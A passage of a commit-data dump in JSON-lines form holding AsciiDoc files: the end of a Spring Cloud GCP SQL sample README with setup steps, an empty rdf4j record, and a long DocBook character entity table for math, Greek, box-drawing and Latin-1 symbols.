Navigate to http:\/\/localhost:8080\/getTuples in your browser to print the contents of the table\ncreated in 5.\n","old_contents":"= Spring Cloud GCP SQL Starter Example\n\nThis code sample demonstrates how to connect to a Google Cloud SQL instance using the\nlink:..\/..\/spring-cloud-gcp-starters\/spring-cloud-gcp-starter-sql\/README.adoc[Spring Cloud GCP SQL\nStarter].\n\nWe will create an instance, a database within the instance, populate the database and then query it.\n\n= Setup & Configuration\n\n1. Follow https:\/\/cloud.google.com\/sql\/docs\/mysql\/quickstart[these instructions] to set up a Google\nCloud Project with billing enabled and a Google Cloud SQL instance.\n\n2. Still within the Google Cloud Console, create a new database in the instance from the\n\"Databases\" section.\n\n3. Open the link:src\/main\/resources\/application.properties[application.properties] file and replace\n*[database-name]* with the name of the database you created in step 2 and *[instance-connection-name]*\nwith the instance connection name of the instance you created in step 1.\n+\nIf you set a root password, you should also add a `spring.cloud.gcp.sql.password` property with the\npassword as the value.\n\n4. https:\/\/cloud.google.com\/sdk\/gcloud\/reference\/auth\/login[Authenticate in the Cloud SDK] or add\na `spring.cloud.gcp.sql.credentials.location` property with the path on your local file system to\na credentials file, prepended with `file:`.\n\n5. Run the `SqlApplication` Spring Boot app. The database will be populated based on the\nlink:src\/main\/resources\/schema.sql[schema.sql] and link:src\/main\/resources\/data.sql[data.sql] files.\n\n6. Navigate to http:\/\/localhost:8080\/getTuples in your browser to print the contents of the table\ncreated in 5.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9519fad8e9c464460d7545996d837aef92854011","subject":"fixed links","message":"fixed links\n\nSigned-off-by: Jeen Broekstra <fbd8ee26f490c4e573d23434640d81bb5e018a41@gmail.com>\n","repos":"eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j","old_file":"doc\/getting-started\/index.adoc","new_file":"doc\/getting-started\/index.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"760927fa9352fa7a2e50c4c3afffc37616a74d92","subject":"more symbols","message":"more symbols","repos":"ufpb-computacao\/asciidoc-book-template-with-rake-and-github,ufpb-computacao\/asciidoc-book-template-with-rake-and-github","old_file":"livro\/capitulos\/symbols.adoc","new_file":"livro\/capitulos\/symbols.adoc","new_contents":"== DocBook Character Entity Reference\n\nThese symbols where extrated from http:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/refchar.html.\n\nThis document was made to show how to write symbols with asciidoc.\nIt was also made to compile with dblatex. For example, since the \n`ℜ` doesn't compile with dblatex it will be here \nlike this: `& real;`. 
But if you are going to use in html or fop, you\ncan use `ℜ`.\n\nYou can see the code for \nhttps:\/\/raw.githubusercontent.com\/edusantana\/novo-livro\/master\/livro\/capitulos\/symbols.adoc[this document here].\n\n=== Added Math Symbols: Arrow Relations Character Entities (%isoamsa;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsb.html[Added Math Symbols: Arrow Relations Character Entities]\n\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| & amalg; | | amalgamation or coproduct\n| & Barwed; | ⊼ | Nand\n| ⌅ | ⊼ | Nand\n| ⋒ | ⋒ | Double intersection\n| ⋓ | ⋓ | Double union\n| ⋎ | ⋎ | Curly logical or\n| ⋏ | ⋏ | Curly logical and\n| ⋄ | ⋄ | Diamond operator\n| ⋇ | ⋇ | Division times\n| ⊺ | ⊺ | Intercalate\n| ⋋ | ⋋ | Left semidirect product\n| ⋉ | ⋉ | Left normal factor semidirect product\n| ⊟ | ⊟ | Squared minus\n| ⊛ | ⊛ | Circled asterisk operator\n| ⊚ | ⊚ | Circled ring operator\n| ⊝ | ⊝ | Circled dash\n| ⊙ | ⊙ | Circled dot operator\n| ⊖ | ⊖ | Circled minus\n| ⊕ | ⊕ | Circled plus\n| ⊘ | ⊘ | Circled division slash\n\n| ⊗ | ⊗ | Circled times\n| ⊞ | ⊞ | Squared plus\n| ∔ | ∔ | Dot plus\n| ⋌ | ⋌ | Right semidirect product\n| ⋊ | ⋊ | Right normal factor semidirect product\n| ⋅ | ⋅ | Dot operator\n| ⊡ | ⊡ | Squared dot operator\n| ∖ | ∖ | Set minus\n| ⊓ | ⊓ | Square cap\n| ⊔ | ⊔ | Square cup\n\n| & ssetmn; | | sm reverse solidus\n| ⋆ | ⋆ | Star operator\n| ⊠ | ⊠ | Squared times\n| ⊤ | ⊤ | Down tack\n| ⊎ | ⊎ | Multiset union\n| ≀ | ≀ | Wreath product\n| ◯ | ◯ | Large circle\n| ▽ | ▽ | White down-pointing triangle\n| △ | △ | White up-pointing triangle\n| ∐ | ∐ | N-ary coproduct\n\n| ∏ | ∏ | N-ary product\n| ∑ | ∑ | N-ary summation\n\n|====\n\n\n=== Added Math Symbols: Binary Operators Character Entities (%isoamsb;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsa.html[Added Math Symbols: Binary Operators Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n\n| ↶ | ↶ | Anticlockwise top semicircle arrow\n| ↷ | ↷ | Clockwise top semicircle arrow\n| ⇓ | ⇓ | Downwards double arrow\n| &darr2; | ⇊ | Downwards paired arrows\n| ⇃ | ⇃ | Downwards harpoon with barb leftwards\n| ⇂ | ⇂ | Downwards harpoon with barb rightwards\n| ⇚ | ⇚ | Leftwards triple arrow\n| ↞ | ↞ | Leftwards two headed arrow\n| &larr2; | ⇇ | Leftwards paired arrows\n| ↩ | ↩ | Leftwards arrow with hook\n| ↫ | ↫ | Leftwards arrow with loop\n| ↢ | ↢ | Leftwards arrow with tail\n| ↽ | ↽ | Leftwards harpoon with barb downwards\n| ↼ | ↼ | Leftwards harpoon with barb upwards\n| ⇔ | ⇔ | Left right double arrow\n| ↔ | ↔ | Left right arrow\n| &lrarr2; | ⇆ | Leftwards arrow over rightwards arrow\n| &rlarr2; | ⇄ | Rightwards arrow over leftwards arrow\n| ↭ | ↭ | Left right wave arrow\n| &rlhar2; | ⇌ | Rightwards harpoon over leftwards harpoon\n| &lrhar2; | ⇋ | Leftwards harpoon over rightwards harpoon\n| ↰ | ↰ | Upwards arrow with tip leftwards\n| ↦ | ↦ | Rightwards arrow from bar\n| ⊸ | ⊸ | Multimap\n| ↗ | ↗ | North east arrow\n| ⇍ | ⇍ | Leftwards double arrow with stroke\n| ↚ | ↚ | Leftwards arrow with stroke\n| ⇎ | ⇎ | Left right double arrow with stroke\n| ↮ | ↮ | Left right arrow with stroke\n| ↛ | ↛ | Rightwards arrow with stroke\n| ⇏ | ⇏ | Rightwards double arrow with stroke\n| ↖ | ↖ | North west arrow\n| ↺ | ↺ | Anticlockwise open circle arrow\n| ↻ | ↻ | Clockwise open circle arrow\n| ⇛ | ⇛ | Rightwards triple 
arrow\n| ↠ | ↠ | Rightwards two headed arrow\n| &rarr2; | ⇉ | Rightwards paired arrows\n| ↪ | ↪ | Rightwards arrow with hook\n| ↬ | ↬ | Rightwards arrow with loop\n| ↣ | ↣ | Rightwards arrow with tail\n| & rarrw; | ⇝ | Rightwards squiggle arrow\n| ⇁ | ⇁ | Rightwards harpoon with barb downwards\n| ⇀ | ⇀ | Rightwards harpoon with barb upwards\n| ↱ | ↱ | Upwards arrow with tip rightwards\n| &drarr; | ↘ | South east arrow\n| &dlarr; | ↙ | South west arrow\n| ⇑ | ⇑ | Upwards double arrow\n| &uarr2; | ⇈ | Upwards paired arrows\n| ⇕ | ⇕ | Up down double arrow\n| ↕ | ↕ | Up down arrow\n| ↿ | ↿ | Upwards harpoon with barb leftwards\n| ↾ | ↾ | Upwards harpoon with barb rightwards\n| & xlArr; | | long l dbl arrow \n| & xhArr; | | long l&r dbl arr\n| & xharr; | | long l&r arr \n| & xrArr; | | long rt dbl arr \n\n\n|====\n\n=== Added Math Symbols: Delimiters Character Entities (%isoamsc;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsc.html[Added Math Symbols: Delimiters Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⌉ | ⌉ | Right ceiling\n| ⌋ | ⌋ | Right floor\n| & rpargt; | | right paren, gt\n| ⌝ | ⌝ | Top right corner\n| ⌟ | ⌟ | Bottom right corner\n| ⌈ | ⌈ | Left ceiling\n| ⌊ | ⌊ | Left floor\n| & lpargt; | | left parenthesis, gt\n| ⌜ | ⌜ | Top left corner\n| ⌞ | ⌞ | Bottom left corner\n|====\n\n=== Added Math Symbols: Negated Relations Character Entities (%isoamsn;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsn.html[Added Math Symbols: Negated Relations Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⪊ | | greater, not approximate\n| ⪈ | ≩ | Greater-than but not equal to\n| ≩ | ≩ | Greater-than but not equal to\n| ⋧ | ⋧ | Greater-than but not equivalent to\n| ≩︀ | | gt, vert, not dbl eq\n| ⪉ | | less, not approximate\n| ≨ | ≨ | Less-than but not equal to\n| ⪇ | ≨ | Less-than but not equal to\n| ⋦ | ⋦ | Less-than but not equivalent to\n| ≨︀ | | less, vert, not dbl eq\n| ≉ | ≉ | Not almost equal to\n| ≇ | ≇ | Neither approximately nor actually equal to\n| ≢ | ≢ | Not identical to\n| ≧̸ | ≱ | Neither greater-than nor equal to\n| ≱ | | not greater-than-or-equal\n| ⩾̸ | ≱ | Neither greater-than nor equal to\n| ≯ | ≯ | Not greater-than\n| ≰ | | not less-than-or-equal\n| ≦̸ | ≰ | Neither less-than nor equal to\n| ⩽̸ | ≰ | Neither less-than nor equal to\n| ≮ | ≮ | Not less-than\n| ⋪ | ⋪ | Not normal subgroup of\n| ⋬ | ⋬ | Not normal subgroup of or equal to\n| ∤ | ∤ | Does not divide\n| ∦ | ∦ | Not parallel to\n| ⊀ | ⊀ | Does not precede\n| ⪯̸ | | not precedes, equals\n| ⋫ | ⋫ | Does not contain as normal subgroup of\n| ⋭ | ⋭ | Does not contain as normal subgroup or equal\n| ⊁ | ⊁ | Does not succeed\n| ⪰̸ | | not succeeds, equals\n| ≁ | ≁ | Not tilde\n| ≄ | ≄ | Not asymptotically equal to\n| ∤ | | nshortmid\n| ∦ | | not short par\n| ⊄ | ⊄ | Not a subset of\n| ⊈ | ⊈ | Neither a subset of nor equal to\n| ⫅̸ | ⊈ | Neither a subset of nor equal to\n| ⊅ | ⊅ | Not a superset of\n| ⫆̸ | ⊉ | Neither a superset of nor equal to\n| ⊉ | ⊉ | Neither a superset of nor equal to\n| ⊬ | ⊬ | Does not prove\n| ⊭ | ⊭ | Not true\n| ⊯ | ⊯ | Negated double vertical bar double right turnstile\n| ⊮ | ⊮ | Does not force\n| & prnap; | & #x22E8; | Precedes but not equivalent to\n| ⪵ | | precedes, not dbl eq\n| & prnsim; | & #x22E8; | Precedes but not equivalent to\n| ⪺ | ⋩ | 
Succeed but not equivalent to\n| ⪶ | | succeeds, not dbl eq\n| ⋩ | ⋩ | Succeed but not equivalent to\n| ⊊ | ⊊ | Subset of or not equal to\n| ⫋ | ⊊ | Subset of or not equal to\n| ⊋ | ⊋ | Superset of or not equal to\n| ⫌ | ⊋ | Superset of or not equal to\n| ⫋︀ | | subset not dbl eq, var\n| ⊊︀ | | subset, not eq, var\n| ⊋︀ | | superset, not eq, var\n| ⫌︀ | | super not dbl eq, var\n\n|====\n\n=== Added Math Symbols: Ordinary Character Entities (%isoamso;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amso.html[Added Math Symbols: Ordinary Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ∠ | ∠ | Angle\n| ∡ | ∡ | Measured angle\n| ℶ | ℶ | Bet symbol\n| ‵ | ‵ | Reversed prime\n| ∁ | ∁ | Complement\n| ℸ | ℸ | Dalet symbol\n| ℓ | ℓ | Script small l\n| ∅ | | emptyset \/varnothing =small o, slash\n| ℷ | ℷ | Gimel symbol\n| ℑ | ℑ | Fraktur letter capital i\n| ı | ı | Latin small letter dotless i\n| & jnodot; | | jmath - small j, no dot\n| ∄ | ∄ | There does not exist\n| Ⓢ | Ⓢ | Circled latin capital letter S\n| ℏ | ħ | Latin small letter h with stroke\n| ℜ | ℜ | Fraktur letter capital r\n| &sbsol; | | sbs - short reverse solidus\n| &vprime; | ′ | Prime\n| ℘ | ℘ | Script capital p\n\n|====\n\n=== Added Math Symbols: Relations Character Entities (%isoamsr;)\nAdded Math Symbols: Relations Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ≊ | ≊ | Almost equal or equal to\n| ≈ | ≍ | Equivalent to\n| & bcong; | & #x224C; | All equal to\n| ϶ | | such that\n| ⋈ | ⋈ | Bowtie\n| ∽ | ∽ | Reversed tilde\n| ⋍ | ⋍ | Reversed tilde equals\n| ≎ | ≎ | Geometrically equivalent to\n| ≏ | ≏ | Difference between\n| ≗ | ≗ | Ring equal to\n| ≔ | ≔ | Colon equals\n| ⋞ | ⋞ | Equal to or precedes\n| ⋟ | ⋟ | Equal to or succeeds\n| &cupre; | ≼ | Precedes or equal to\n| ⊣ | ⊣ | Left tack\n| ≖ | ≖ | Ring in equal to\n| ≕ | ≕ | Equals colon\n| ≑ | ≑ | Geometrically equal to\n| ≐ | ≐ | Approaches the limit\n| ≒ | ≒ | Approximately equal to or the image of\n| ⪖ | ⋝ | Equal to or greater-than\n| ⪕ | ⋜ | Equal to or less-than\n| ≓ | ≓ | Image of or approximately equal to\n| ⋔ | ⋔ | Pitchfork\n| ⌢ | ⌢ | Frown\n| & gap; | & #x2273; | Greater-than or equivalent to\n| &gsdot; | ⋗ | Greater-than with dot\n| ≧ | ≧ | Greater-than over equal to\n| ⋛ | ⋛ | Greater-than equal to or less-than\n| ⪌ | ⋛ | Greater-than equal to or less-than\n| ⩾ | | gt-or-equal, slanted\n| & Gg; | & #x22D9; | Very much greater-than\n| ≷ | ≷ | Greater-than or less-than\n| & gsim; | & #x2273; | Greater-than or equivalent to\n| ≫ | ≫ | Much greater-than\n| & lap; | & #x2272; | Less-than or equivalent to\n| &ldot; | ⋖ | Less-than with dot\n| ≦ | ≦ | Less-than over equal to\n| ⪋ | ⋚ | Less-than equal to or greater-than\n| ⋚ | ⋚ | Less-than equal to or greater-than\n| ⩽ | | less-than-or-eq, slant\n| ≶ | ≶ | Less-than or greater-than\n| & Ll; | & #x22D8; | Very much less-than\n| & lsim; | & #x2272; | Less-than or equivalent to\n| & Lt; | & #x226A; | Much less-than\n| ⊴ | ⊴ | Normal subgroup of or equal to\n| ∣ | ∣ | Divides\n| & models; | & #x22A7; | Models\n| ≺ | ≺ | Precedes\n| ⪷ | ≾ | Precedes or equivalent to\n| ⪯ | | precedes, equals\n| ≾ | ≾ | Precedes or equivalent to\n| ⊵ | ⊵ | Contains as normal subgroup or equal to\n| &samalg; | ∐ | N-ary coproduct\n| ≻ | ≻ | Succeeds\n| ⪸ | ≿ | Succeeds or equivalent to\n| ≽ | ≽ | Succeeds or equal to\n| ⪰ | ≽ | 
Succeeds or equal to\n| ≿ | ≿ | Succeeds or equivalent to\n| ⌢ | | small down curve\n| ∣ | | \u00a0\n| ⌣ | ⌣ | Smile\n| ∥ | | short parallel\n| ⊏ | ⊏ | Square image of\n| ⊑ | ⊑ | Square image of or equal to\n| ⊐ | ⊐ | Square original of\n| ⊒ | ⊒ | Square original of or equal to\n| ⌣ | | small up curve\n| ⋐ | ⋐ | Double subset\n| ⫅ | ⊆ | Subset of or equal to\n| ⋑ | ⋑ | Double superset\n| ⫆ | ⊇ | Superset of or equal to\n| ≈ | | thick approximate\n| ∼ | | thick similar\n| ≜ | ≜ | Delta equal to\n| ≬ | ≬ | Between\n| ⊢ | ⊢ | Right tack\n| ⊩ | ⊩ | Forces\n| & vDash; | & #x22A8; | True\n| ⊻ | ⊻ | Xor\n| ⊲ | ⊲ | Normal subgroup of\n| ∝ | ∝ | Proportional to\n| ⊳ | ⊳ | Contains as normal subgroup\n| ⊪ | ⊪ | Triple vertical bar right turnstile\n\n|====\n\n\n=== Box and Line Drawing Character Entities (%isobox;)\nBox and Line Drawing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ─ | ─ | Box drawings light horizontal\n| │ | │ | Box drawings light vertical\n| └ | └ | Box drawings light up and right\n| ┘ | ┘ | Box drawings light up and left\n| ┐ | ┐ | Box drawings light down and left\n| ┌ | ┌ | Box drawings light down and right\n| ├ | ├ | Box drawings light vertical and right\n| ┴ | ┴ | Box drawings light up and horizontal\n| ┤ | ┤ | Box drawings light vertical and left\n| ┬ | ┬ | Box drawings light down and horizontal\n| ┼ | ┼ | Box drawings light vertical and horizontal\n| ╞ | ╞ | Box drawings vertical single and right double\n| ╨ | ╨ | Box drawings up double and horizontal single\n| ╡ | ╡ | Box drawings vertical single and left double\n| ╥ | ╥ | Box drawings down double and horizontal single\n| ╪ | ╪ | Box drawings vertical single and horizontal double\n| ═ | ═ | Box drawings double horizontal\n| ║ | ║ | Box drawings double vertical\n| ╚ | ╚ | Box drawings double up and right\n| ╝ | ╝ | Box drawings double up and left\n| ╗ | ╗ | Box drawings double down and left\n| ╔ | ╔ | Box drawings double down and right\n| ╠ | ╠ | Box drawings double vertical and right\n| ╩ | ╩ | Box drawings double up and horizontal\n| ╣ | ╣ | Box drawings double vertical and left\n| ╦ | ╦ | Box drawings double down and horizontal\n| ╬ | ╬ | Box drawings double vertical and horizontal\n| ╟ | ╟ | Box drawings vertical double and right single\n| ╧ | ╧ | Box drawings up single and horizontal double\n| ╢ | ╢ | Box drawings vertical double and left single\n| ╤ | ╤ | Box drawings down single and horizontal double\n| ╫ | ╫ | Box drawings vertical double and horizontal single\n| ╘ | ╘ | Box drawings up single and right double\n| ╜ | ╜ | Box drawings up double and left single\n| ╕ | ╕ | Box drawings down single and left double\n| ╓ | ╓ | Box drawings down double and right single\n| ╙ | ╙ | Box drawings up double and right single\n| ╛ | ╛ | Box drawings up single and left double\n| ╖ | ╖ | Box drawings down double and left single\n| ╒ | ╒ | Box drawings down single and right double\n\n|====\n\n\n=== Russian Cyrillic Character Entities (%isocyr1;)\nRussian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Non-Russian Cyrillic Character Entities (%isocyr2;)\nNon-Russian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Diacritical Marks Character Entities (%isodia;)\nDiacritical Marks Character 
Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Greek Letters Character Entities (%isogrk1;)\nGreek Letters Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Monotoniko Greek Character Entities (%isogrk2;)\nMonotoniko Greek Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| &agr; | α | Greek small letter alpha\n| &Agr; | Α | Greek capital letter ALPHA\n| &bgr; | β | Greek small letter beta\n| &Bgr; | Β | Greek capital letter BETA\n| &ggr; | γ | Greek small letter gamma\n| &Ggr; | Γ | Greek capital letter GAMMA\n| &dgr; | δ | Greek small letter delta\n| &Dgr; | Δ | Greek capital letter DELTA\n| & egr; | & #x03B5; | Greek small letter epsilon\n| & Egr; | & #x395; | Greek capital letter EPSILON\n| &zgr; | ζ | Greek small letter zeta\n| &Zgr; | Ζ | Greek capital letter ZETA\n| &eegr; | η | Greek small letter eta\n| &EEgr; | Η | Greek capital letter ETA\n| & thgr; | & #x03B8; | Greek small letter theta\n| &THgr; | Θ | Greek capital letter THETA\n| &igr; | ι | Greek small letter iota\n| &Igr; | Ι | Greek capital letter IOTA\n| &kgr; | κ | Greek small letter kappa\n| &Kgr; | Κ | Greek capital letter KAPPA\n| &lgr; | λ | Greek small letter lamda\n| &Lgr; | Λ | Greek capital letter LAMDA\n| &mgr; | μ | Greek small letter mu\n| &Mgr; | Μ | Greek capital letter MU\n| &ngr; | ν | Greek small letter nu\n| &Ngr; | Ν | Greek capital letter NU\n| &xgr; | ξ | Greek small letter xi\n| &Xgr; | Ξ | Greek capital letter XI\n| &ogr; | ο | Greek small letter omicron\n| &Ogr; | Ο | Greek capital letter OMICRON\n| &pgr; | π | Greek small letter pi\n| &Pgr; | Π | Greek capital letter PI\n| &rgr; | ρ | Greek small letter rho\n| &Rgr; | Ρ | Greek capital letter RHO\n| &sgr; | σ | Greek small letter sigma\n| &Sgr; | Σ | Greek capital letter SIGMA\n| &sfgr; | ς | Greek small letter final sigma\n| &tgr; | τ | Greek small letter tau\n| & Tgr; | & #x03A4; | Greek capital letter TAU\n| &ugr; | υ | Greek small letter upsilon\n| &Ugr; | Υ | Greek capital letter UPSILON\n| &phgr; | φ | Greek small letter phi\n| &PHgr; | Φ | Greek capital letter PHI\n| &khgr; | χ | Greek small letter chi\n| &KHgr; | Χ | Greek capital letter CHI\n| &psgr; | ψ | Greek small letter psi\n| &PSgr; | Ψ | Greek capital letter PSI\n| &ohgr; | ω | Greek small letter omega\n| &OHgr; | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Greek Symbols Character Entities (%isogrk3;)\nGreek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| α | α | Greek small letter alpha\n| β | β | Greek small letter beta\n| γ | γ | Greek small letter gamma\n| Γ | Γ | Greek capital letter GAMMA\n| ϝ | Ϝ | Greek letter digamma\n| δ | δ | Greek small letter delta\n| Δ | Δ | Greek capital letter DELTA\n| ε | ε | Greek small letter epsilon\n| & epsiv; | & #x025B; | Latin small letter open e\n| & epsis; | & #x03B5; | Greek small letter epsilon\n| ζ | ζ | Greek small letter zeta\n| η | η | Greek small letter eta\n| & thetas; | & #x03B8; | Greek small letter theta\n| Θ | Θ | Greek capital letter THETA\n| & thetav; | & #x03D1; | Greek theta symbol\n| ι | ι | Greek small letter iota\n| κ | κ | Greek small letter kappa\n| ϰ | ϰ | Greek kappa symbol\n| λ | λ | Greek small letter lamda\n| Λ | Λ 
| Greek capital letter LAMDA\n| μ | μ | Greek small letter mu\n| ν | ν | Greek small letter nu\n| ξ | ξ | Greek small letter xi\n| Ξ | Ξ | Greek capital letter XI\n| π | π | Greek small letter pi\n| ϖ | ϖ | Greek omega symbol\n| Π | Π | Greek capital letter PI\n| ρ | ρ | Greek small letter rho\n| ϱ | ϱ | Greek rho symbol\n| σ | σ | Greek small letter sigma\n| Σ | Σ | Greek capital letter SIGMA\n| ς | ς | Greek small letter final sigma\n| τ | τ | Greek small letter tau\n| υ | υ | Greek small letter upsilon\n| ϒ | ϒ | Greek upsilon with hook symbol\n| &phis; | φ | Greek small letter phi\n| Φ | Φ | Greek capital letter PHI\n| ϕ | ϕ | Greek phi symbol\n| χ | χ | Greek small letter chi\n| ψ | ψ | Greek small letter psi\n| Ψ | Ψ | Greek capital letter PSI\n| ω | ω | Greek small letter omega\n| Ω | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Alternative Greek Symbols Character Entities (%isogrk4;)\nAlternative Greek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| &b.alpha; | α | Greek small letter alpha\n| &b.beta; | β | Greek small letter beta\n| &b.gamma; | γ | Greek small letter gamma\n| &b.Gamma; | Γ | Greek capital letter GAMMA\n| &b.gammad; | Ϝ | Greek letter digamma\n| &b.delta; | δ | Greek small letter delta\n| &b.Delta; | Δ | Greek capital letter DELTA\n| &b.epsi; | ε | Greek small letter epsilon\n| & b.epsiv; | & #x025B; | Latin small letter open e\n| &b.epsis; | ε | Greek small letter epsilon\n| &b.zeta; | ζ | Greek small letter zeta\n| &b.eta; | η | Greek small letter eta\n| & b.thetas; | & #x03B8; | Greek small letter theta\n| & b.Theta; | & #x398; | Greek capital letter THETA\n| & b.thetav; | & #x03D1; | Greek theta symbol\n| &b.iota; | ι | Greek small letter iota\n| &b.kappa; | κ | Greek small letter kappa\n| &b.kappav; | ϰ | Greek kappa symbol\n| &b.lambda; | λ | Greek small letter lamda\n| &b.Lambda; | Λ | Greek capital letter LAMDA\n| &b.mu; | μ | Greek small letter mu\n| &b.nu; | ν | Greek small letter nu\n| &b.xi; | ξ | Greek small letter xi\n| &b.Xi; | Ξ | Greek capital letter XI\n| &b.pi; | π | Greek small letter pi\n| &b.Pi; | Π | Greek capital letter PI\n| &b.piv; | ϖ | Greek omega symbol\n| &b.rho; | ρ | Greek small letter rho\n| &b.rhov; | ϱ | Greek rho symbol\n| &b.sigma; | σ | Greek small letter sigma\n| &b.Sigma; | Σ | Greek capital letter SIGMA\n| &b.sigmav; | ς | Greek small letter final sigma\n| &b.tau; | τ | Greek small letter tau\n| &b.upsi; | υ | Greek small letter upsilon\n| &b.Upsi; | ϒ | Greek upsilon with hook symbol\n| &b.phis; | φ | Greek small letter phi\n| &b.Phi; | Φ | Greek capital letter PHI\n| &b.phiv; | ϕ | Greek phi symbol\n| &b.chi; | χ | Greek small letter chi\n| &b.psi; | ψ | Greek small letter psi\n| &b.Psi; | Ψ | Greek capital letter PSI\n| &b.omega; | ω | Greek small letter omega\n| &b.Omega; | Ω | Greek capital letter OMEGA\n|====\n\n\n=== ISO Latin 1 Character Entities (%isolat1;)\nISO Latin 1 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| á | | Latin small letter a with acute\n| Á | Á | Latin capital letter A with acute\n| â | | Latin small letter a with circumflex\n| Â | Â | Latin capital letter A with circumflex\n| à | | Latin small letter a with grave\n| À | À | Latin capital letter A with grave\n| å | | Latin small letter a with ring above\n| Å | Å | Latin capital letter A with ring above\n| ã | | Latin small letter a with tilde\n| Ã | Ã | 
Latin capital letter A with tilde\n| ä | | Latin small letter a with diaeresis\n| Ä | Ä | Latin capital letter A with diaeresis\n| æ | | Latin small letter ae\n| Æ | Æ | Latin capital letter AE\n| ç | | Latin small letter c with cedilla\n| Ç | Ç | Latin capital letter C with cedilla\n| ð | ð | Latin small letter eth\n| Ð | Ð | Latin capital letter ETH\n| é | | Latin small letter e with acute\n| É | É | Latin capital letter E with acute\n| ê | ê | Latin small letter e with circumflex\n| Ê | Ê | Latin capital letter E with circumflex\n| è | | Latin small letter e with grave\n| È | È | Latin capital letter E with grave\n| ë | ë | Latin small letter e with diaeresis\n| Ë | Ë | Latin capital letter E with diaeresis\n| í | í | Latin small letter i with acute\n| Í | Í | Latin capital letter I with acute\n| î | î | Latin small letter i with circumflex\n| Î | Î | Latin capital letter I with circumflex\n| ì | ì | Latin small letter i with grave\n| Ì | Ì | Latin capital letter I with grave\n| ï | ï | Latin small letter i with diaeresis\n| Ï | Ï | Latin capital letter I with diaeresis\n| ñ | ñ | Latin small letter n with tilde\n| Ñ | Ñ | Latin capital letter N with tilde\n| ó | ó | Latin small letter o with acute\n| Ó | Ó | Latin capital letter O with acute\n| ô | ô | Latin small letter o with circumflex\n| Ô | Ô | Latin capital letter O with circumflex\n| ò | ò | Latin small letter o with grave\n| Ò | Ò | Latin capital letter O with grave\n| ø | ø | Latin small letter o with stroke\n| Ø | Ø | Latin capital letter O with stroke\n| õ | õ | Latin small letter o with tilde\n| Õ | Õ | Latin capital letter O with tilde\n| ö | ö | Latin small letter o with diaeresis\n| Ö | Ö | Latin capital letter O with diaeresis\n| ß | ß | Latin small letter sharp s\n| þ | þ | Latin small letter thorn\n| Þ | Þ | Latin capital letter THORN\n| ú | ú | Latin small letter u with acute\n| Ú | Ú | Latin capital letter U with acute\n| û | û | Latin small letter u with circumflex\n| Û | Û | Latin capital letter U with circumflex\n| ù | ù | Latin small letter u with grave\n| Ù | Ù | Latin capital letter U with grave\n| ü | ü | Latin small letter u with diaeresis\n| Ü | Ü | Latin capital letter U with diaeresis\n| ý | ý | Latin small letter y with acute\n| Ý | Ý | Latin capital letter Y with acute\n| ÿ | ÿ | Latin small letter y with diaeresis\n\n|====\n\n\n=== Added Latin 2 Character Entities (%isolat2;)\nAdded Latin 2 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Numeric and Special Graphic Character Entities (%isonum;)\nNumeric and Special Graphic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Publishing Character Entities (%isopub;)\nPublishing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", 